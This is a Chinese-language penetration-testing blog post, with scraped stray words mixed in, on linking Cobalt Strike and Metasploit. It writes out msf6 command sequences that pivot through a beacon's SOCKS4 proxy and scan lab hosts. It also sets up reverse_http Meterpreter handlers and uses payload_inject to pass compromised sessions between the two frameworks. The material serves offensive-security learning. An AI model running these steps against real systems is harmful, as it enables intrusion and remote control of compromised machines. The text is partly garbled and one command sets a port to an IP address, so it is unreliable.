通常在渗透的过程当中,Get到shell以后通常来讲我喜欢上线到Cobaltstrike,可是Cobaltstrike的会话是60S更新一次,有时候功能也并无MSF完善(个人插件不够厉害哈哈),那么今天我准备记录一下如何实现Cobaltstrike与MSF的联动,而且在下面几篇文章里,我准备着重讲一下隧道技术,尤为是SSH隧道技术、SOCK4隧道技术、SOCK5隧道技术。html
首先Cobaltstrike获取一个会话,而后搭建SockS。
shell
而后再view里找到Proxy Pivots,点击Tunnel查看代理设置。
打开Metasploit,设置Socks代理windows
msf6 > setg Proxies socks4:192.168.37.129:8265 //设置走Cobaltstrike的代理通道 Proxies => socks4:192.168.37.129:8265 msf6 > setg ReverseAllowProxy true //设置容许双向通道 ReverseAllowProxy => true msf6 > use auxiliary/scanner/ip/ipidseq //设置寻找空闲主机 msf6 auxiliary(scanner/ip/ipidseq) > show options msf6 auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.37.128-135 RHOSTS => 192.168.37.128-135 msf6 auxiliary(scanner/ip/ipidseq) > run
发现成功扫描到空闲主机:
安全
当Cobaltstrike获取到上线主机后,有时候须要传递会话到MSF,操做以下:session
首先创建新的Foreign HTTP监听器,设置IP为MSF接收的IP,设置Port是一下子MSF监听的端口
tcp
而后打开MSF,设置好监听器:加密
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_http msf6 exploit(multi/handler) > set lhost 192.168.37.134 lhost => 192.168.37.134 msf6 exploit(multi/handler) > set lport 8088 lport => 8088 msf6 exploit(multi/handler) > run -j
而后打开Cobaltstrike,转发会话,方法以下,在会话栏里选择spawn,选择payload为刚才设置的MSFpayload,选择Choose后Metasploit接收到会话。spa
若是Metasploit已经获取到了一个会话,能够经过payload_inject模块进行会话派生,将会话传递到Cobaltstrike。插件
这里我尝试先用MSF进行流量加密,再进行会话派生,具体可参照博客:https://www.cnblogs.com/culin/#/c/subject/p/15119863.html。3d
操做以下,首先Cobaltstrike创建新Becon HTTP的监听器,设置好监听的IP和Port
而后获取到MSF的会话后,须要调用payload_inject模块,方法以下
msf6> use exploit/windows/local/payload_inject msf6> set payload windows/meterpreter/reverse_http //注意payload的匹配 msf6> set session 2 //须要转发会话的SESSION msf6> set lhost 192.168.34.129 //设置须要转发的IP msf6> set lport 192.168.34.129 //设置须要转发的port msf6> run //开始转发
能够成功看到会话就转发成功了:
此时Cobaltstrike的会话也会被加密,更加的安全一。